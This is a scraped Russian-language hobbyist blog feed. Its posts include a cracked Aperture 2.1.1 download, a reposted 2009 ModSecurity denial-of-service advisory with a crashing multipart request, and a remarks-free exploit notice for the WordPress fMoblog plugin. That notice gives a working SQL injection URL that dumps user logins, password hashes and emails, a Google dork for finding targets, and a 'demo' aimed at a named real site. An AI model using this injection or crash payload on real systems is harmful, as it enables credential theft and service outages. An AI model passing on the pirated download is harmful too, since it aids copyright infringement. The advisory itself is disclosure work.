-
10
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Понравилось: 10 пользователям
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Продолжаю выкладывать накопившийся у меня Mac OS софт. На этот раз это пакет для обработки фотографий
Aperture 2.1.1. Apple позиционирует его как программный продукт способный полностью заменить Photoshop.
По мнению большинства профессиональных фотографов, продукт показывает высочайшее качество в обработке
фотографий в любом современном формате. Лекарство прилагается.
Aperture_2.1.1_mac.part1.rar
Aperture_2.1.1_mac.part2.rar
Aperture_2.1.1_mac.part3.rar
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Теперь у меня есть персональная страница на Я.ру — giz-moo!
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Встретились как-то Mac и PC...
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Многие люди знают и поют песню "Рябиновые бусы", а я пою
"Рубиновые рельсы"
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Нашел CMSку под названием Baran-CMS
http://www.baran-cms.ir.
Особенно прикольно, что она тоже уязвима. Похоже то ли Иран, то ли
Ирак.
Кодер- БАРАН !
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################
# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-001
- Original release date: February 25th, 2009
- Last revised: March 19th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 7.8/10 (CVSS Base Scored)
=============================================
I. VULNERABILITY
-------------------------
ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)
II. BACKGROUND
-------------------------
ModSecurity is the most widely-deployed web application firewall in
the world, with more than 15,000 users. It runs as a Apache web server
module and is developed by Breach Security [
http://www.breach.com ],
it's avaliable with GNU GPL and many other comercial licenses.
III. DESCRIPTION
-------------------------
The multipart processor of modsecurity does not sanitize the user
supplied input sufficiently. Therefore, an attacker can send a crafted
post request of type multipart/form-data which will lead in a remote
denial of service.
The snippet of vulnerable code:
in file msc_multipart.c
1256 int multipart_get_arguments(modsec_rec *msr, char *origin,
apr_table_t *arguments) {
1257 multipart_part **parts;
1258 int i;
1259
1260 parts = (multipart_part **)msr->mpd->parts->elts;
1261 for(i = 0; i < msr->mpd->parts->nelts; i++) {
1262 if (parts[i]->type == MULTIPART_FORMDATA) {
1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp,
sizeof(msc_arg));
1264 if (arg == NULL) return -1;
1265
1266 arg->name = parts[i]->name;
1267 arg->name_len = strlen(parts[i]->name);
On line 1267, due to the pointer parts[i]->name is not properly
sanitized the parameter of strlen function takes the value NULL,
getting a segmentation fault and resulting in a crash of the apache
process that handle the request.
IV. PROOF OF CONCEPT
-------------------------
The process could be crashed remotely by sending:
POST / HTTP/1.0
Content-Type: multipart/form-data;
boundary=---------------------------xxxxxxxxxxxxxx
Content-Length: 91
-----------------------------xxxxxxxxxxxxxx
:
-----------------------------xxxxxxxxxxxxxx--
In order to send a correct HTTP/1.1 request you must add a valid Host
header.
With the configuration directives:
SecAuditEngine On
SecDebugLogLevel 9
After the attack, the last line of the debug logfile is:
[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9]
Multipart: Added part abe458 to the list: name "(null)" (offset 0,
length 0)
V. BUSINESS IMPACT
-------------------------
An attacker could cause a remote denial of service to an Apache
installation with modsecurity 2 module.
VI. SYSTEMS AFFECTED
-------------------------
ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may
be affected.
Tested with Apache httpd 2.2.11.
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Скачал сегодня Back Track 4 beta. Юзаю теперь, пробую что да как. Оказывается эта сборка основана не как все прежние на SLAX, а на убунте. Ядро вроде свежее, все работает. Софта море. Буду тестить.
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
Захожу значит я на сайт UnixLive.su , а у меня Ad Muncher стоит, и вижу вот такую хрень:
l
